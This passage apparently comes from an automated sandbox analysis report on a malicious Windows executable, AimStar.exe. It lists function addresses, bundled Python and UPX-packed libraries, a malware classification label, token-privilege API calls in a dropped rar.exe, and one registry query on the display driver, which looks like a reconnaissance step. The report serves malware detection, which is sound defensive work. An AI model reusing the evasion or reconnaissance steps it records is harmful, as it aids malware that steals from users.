              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F51DC42_2_00007FF710F51DC4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F5E5E02_2_00007FF710F5E5E0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F536102_2_00007FF710F53610
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F498702_2_00007FF710F49870
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F618E42_2_00007FF710F618E4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F5DF602_2_00007FF710F5DF60
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F697982_2_00007FF710F69798
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F517B02_2_00007FF710F517B0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F51FD02_2_00007FF710F51FD0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F588042_2_00007FF710F58804
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A82003302_2_00007FF8A8200330
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A81519502_2_00007FF8A8151950
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A81522702_2_00007FF8A8152270
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A81513002_2_00007FF8A8151300
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87190602_2_00007FF8A8719060
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87B29E02_2_00007FF8A87B29E0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87D4CF02_2_00007FF8A87D4CF0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87CCFB02_2_00007FF8A87CCFB0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87692C02_2_00007FF8A87692C0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87722E02_2_00007FF8A87722E0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87959102_2_00007FF8A8795910
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87669402_2_00007FF8A8766940
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A875FA202_2_00007FF8A875FA20
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8779A302_2_00007FF8A8779A30
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87BBB802_2_00007FF8A87BBB80
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8759BA02_2_00007FF8A8759BA0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87B4BB02_2_00007FF8A87B4BB0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87A6BD02_2_00007FF8A87A6BD0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87ACCD02_2_00007FF8A87ACCD0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A878CCE92_2_00007FF8A878CCE9
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8753C102_2_00007FF8A8753C10
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A876CC402_2_00007FF8A876CC40
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8802C602_2_00007FF8A8802C60
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8760DD02_2_00007FF8A8760DD0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87E8D002_2_00007FF8A87E8D00
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8769D102_2_00007FF8A8769D10
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87DAD202_2_00007FF8A87DAD20
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A875BD402_2_00007FF8A875BD40
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87ABD502_2_00007FF8A87ABD50
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A877DE402_2_00007FF8A877DE40
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A8794F002_2_00007FF8A8794F00
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87ECF202_2_00007FF8A87ECF20
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87780B02_2_00007FF8A87780B0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87770D02_2_00007FF8A87770D0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A88050302_2_00007FF8A8805030
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87DC0402_2_00007FF8A87DC040
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87531A52_2_00007FF8A87531A5
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87621F02_2_00007FF8A87621F0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87541202_2_00007FF8A8754120
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A876D2B02_2_00007FF8A876D2B0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87DA3802_2_00007FF8A87DA380
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A876C3802_2_00007FF8A876C380
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A877F3802_2_00007FF8A877F380
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A877D3A02_2_00007FF8A877D3A0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87B73E02_2_00007FF8A87B73E0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A88143202_2_00007FF8A8814320
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87573362_2_00007FF8A8757336
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A879F3602_2_00007FF8A879F360
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87594E02_2_00007FF8A87594E0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87C44302_2_00007FF8A87C4430
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A879A5A02_2_00007FF8A879A5A0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87F55102_2_00007FF8A87F5510
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87545702_2_00007FF8A8754570
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87746302_2_00007FF8A8774630
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87816302_2_00007FF8A8781630
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87AB6402_2_00007FF8A87AB640
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A877E6502_2_00007FF8A877E650
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87636602_2_00007FF8A8763660
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A87C77D02_2_00007FF8A87C77D0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A9315C002_2_00007FF8A9315C00
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A92D16182_2_00007FF8A92D1618
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A92D1EE22_2_00007FF8A92D1EE2
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A93089202_2_00007FF8A9308920
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A934AC802_2_00007FF8A934AC80
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A92D1A0F2_2_00007FF8A92D1A0F
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF8A92D26172_2_00007FF8A92D2617
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF8476B302712_2_00007FF8476B3027
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 57_2_00007FF8475D3EA557_2_00007FF8475D3EA5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 57_2_00007FF8475D20FD57_2_00007FF8475D20FD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 57_2_00007FF8476A17D957_2_00007FF8476A17D9
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139654C088_2_00007FF7139654C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139582F088_2_00007FF7139582F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396118088_2_00007FF713961180
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395188488_2_00007FF713951884
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395B54088_2_00007FF71395B540
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395ABA088_2_00007FF71395ABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713987B2488_2_00007FF713987B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713960A2C88_2_00007FF713960A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71397AE1088_2_00007FF71397AE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395A50488_2_00007FF71395A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71397D45888_2_00007FF71397D458
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399546888_2_00007FF713995468
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71397C3E088_2_00007FF71397C3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A832C88_2_00007FF7139A832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396236088_2_00007FF713962360
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398037488_2_00007FF713980374
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396D2C088_2_00007FF71396D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139902A488_2_00007FF7139902A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A131488_2_00007FF7139A1314
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139542E088_2_00007FF7139542E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71397724488_2_00007FF713977244
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395F24C88_2_00007FF71395F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396E21C88_2_00007FF71396E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A226888_2_00007FF7139A2268
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139981CC88_2_00007FF7139981CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139B41CC88_2_00007FF7139B41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399216488_2_00007FF713992164
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A18A888_2_00007FF7139A18A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398090488_2_00007FF713980904
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399190C88_2_00007FF71399190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139838E888_2_00007FF7139838E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395888488_2_00007FF713958884
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396289088_2_00007FF713962890
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139617C888_2_00007FF7139617C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139767E088_2_00007FF7139767E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139686C488_2_00007FF7139686C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139B86D488_2_00007FF7139B86D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399270088_2_00007FF713992700
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398A71088_2_00007FF71398A710
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399071088_2_00007FF713990710
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A766088_2_00007FF7139A7660
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396859888_2_00007FF713968598
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398F59C88_2_00007FF71398F59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71397F5B088_2_00007FF71397F5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139865FC88_2_00007FF7139865FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A260C88_2_00007FF7139A260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395DD0488_2_00007FF71395DD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713979D0C88_2_00007FF713979D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A6D0C88_2_00007FF7139A6D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713968C3088_2_00007FF713968C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713995C8C88_2_00007FF713995C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A9B9888_2_00007FF7139A9B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713994B3888_2_00007FF713994B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139BAAC088_2_00007FF7139BAAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395CB1488_2_00007FF71395CB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713995A7088_2_00007FF713995A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398FA6C88_2_00007FF71398FA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139549B888_2_00007FF7139549B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139969FD88_2_00007FF7139969FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398D91C88_2_00007FF71398D91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71397D97C88_2_00007FF71397D97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71397010488_2_00007FF713970104
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139B00F088_2_00007FF7139B00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398804088_2_00007FF713988040
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396303088_2_00007FF713963030
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71397C05C88_2_00007FF71397C05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398007488_2_00007FF713980074
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398C00C88_2_00007FF71398C00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139BDFD888_2_00007FF7139BDFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713994FE888_2_00007FF713994FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713985F4C88_2_00007FF713985F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139BAF9088_2_00007FF7139BAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399EEA488_2_00007FF71399EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713959EFC88_2_00007FF713959EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71398AF0C88_2_00007FF71398AF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399AE5088_2_00007FF71399AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395CE8488_2_00007FF71395CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139AFE7488_2_00007FF7139AFE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713968E6888_2_00007FF713968E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139A1DCC88_2_00007FF7139A1DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713961E0488_2_00007FF713961E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71395EE0888_2_00007FF71395EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713980D2088_2_00007FF713980D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713999D7488_2_00007FF713999D74
              Source: C:\Users\user\Desktop\AimStar.exeCode function: String function: 00007FF8A8759350 appears 126 times
              Source: C:\Users\user\Desktop\AimStar.exeCode function: String function: 00007FF8A934D32F appears 37 times
              Source: C:\Users\user\Desktop\AimStar.exeCode function: String function: 00007FF8A875A510 appears 155 times
              Source: C:\Users\user\Desktop\AimStar.exeCode function: String function: 00007FF710F42710 appears 104 times
              Source: C:\Users\user\Desktop\AimStar.exeCode function: String function: 00007FF8A92D1325 appears 68 times
              Source: C:\Users\user\Desktop\AimStar.exeCode function: String function: 00007FF710F42910 appears 34 times
              Source: C:\Users\user\Desktop\AimStar.exeCode function: String function: 00007FF8A934D341 appears 191 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: String function: 00007FF7139949F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: String function: 00007FF713968444 appears 48 times
              Source: AimStar.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: AimStar.exeBinary or memory string: OriginalFilename vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2018659572.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2018959049.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000000.2017931860.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2018501635.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2019145684.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2022068584.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2018741735.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2018305938.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2022324030.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2022622103.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2018393901.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2019051678.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000000.00000003.2018862526.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs AimStar.exe
              Source: AimStar.exeBinary or memory string: OriginalFilename vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2423868259.00007FF8B93D8000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2424380802.00007FF8B9F6C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2422923145.00007FF8B8B14000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2423234762.00007FF8B8B4A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2423603752.00007FF8B8F96000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2420980219.00007FF8A8F27000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython313.dll. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2422610112.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2424121651.00007FF8B984C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2422253288.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2418850491.00007FF8A871A000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2421894118.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2424947255.00007FF8BFACA000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs AimStar.exe
              Source: AimStar.exe, 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs AimStar.exe
              Source: AimStar.exeBinary or memory string: OriginalFilenameISOBURN.EXEj% vs AimStar.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python313.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9994215874784359
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9980279432552503
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9925709355828221
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@172/63@4/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396CAFC GetLastError,FormatMessageW,88_2_00007FF71396CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71399B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,88_2_00007FF71399B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,88_2_00007FF71396EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF713973144 GetDiskFreeSpaceExW,88_2_00007FF713973144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
